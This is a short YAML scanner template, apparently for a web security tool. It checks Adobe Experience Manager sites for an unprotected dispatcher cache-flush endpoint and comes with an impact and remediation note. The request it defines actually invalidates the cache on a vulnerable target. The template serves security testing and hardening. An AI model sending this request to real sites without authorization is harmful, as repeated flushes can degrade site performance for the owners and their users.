id: aem-cached-flush
info:
  name: Invalidate / Flush Cached Pages From AEM
  risk: Low

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/dispatcher/invalidate.cache
    headers:
      - User-Agent: curl/7.0
      - CQ-Handle: /content
      - CQ-Path: /content
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "<h1>ok</h1>") || StringSearch("response", "<H1>OK</H1>")

reference:
  - link: https://twitter.com/AEMSecurity/status/1245684143083655177
  - report: |
      [+] Impact: 
      Unauthorized attackers can invalidate/flush dispatcher cache remotely without any rate limiting. If this is done repeatedly it can severely impact the site performance.

      [+] Solution: 
      This happens because "/allowedClients" property is not defined in the dispatcher configuration of target AEM
      The /allowedClients property should define specific clients that are allowed to flush the cache (delete and or modify/update files) on the server.